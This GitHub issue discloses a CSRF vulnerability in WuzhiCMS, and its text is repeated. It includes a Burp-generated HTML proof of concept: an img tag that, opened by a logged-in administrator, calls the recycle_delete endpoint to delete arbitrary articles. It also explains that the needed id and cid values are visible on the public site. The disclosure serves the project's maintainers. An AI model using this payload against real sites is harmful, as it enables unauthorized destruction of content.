Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
After the administrator logged in, open the following page poc: one.html---Delete any article
<html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <img src=http://127.0.0.1/wuzhicms-master/index.php?m=content&f=content&v=recycle_delete&id=182&cid=43&_su=wuzhicms&_menuid=26/> </body> </html>
Id and cid parameters can be seen in the foreground
like this http://127.0.0.1/wuzhicms-master/index.php?v=show&cid=9&id=31
The text was updated successfully, but these errors were encountered:
No branches or pull requests
After the administrator logged in, open the following page
poc:
one.html---Delete any article
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<img src=http://127.0.0.1/wuzhicms-master/index.php?m=content&f=content&v=recycle_delete&id=182&cid=43&_su=wuzhicms&_menuid=26/>
</body>
</html>
Id and cid parameters can be seen in the foreground
like this
http://127.0.0.1/wuzhicms-master/index.php?v=show&cid=9&id=31
The text was updated successfully, but these errors were encountered: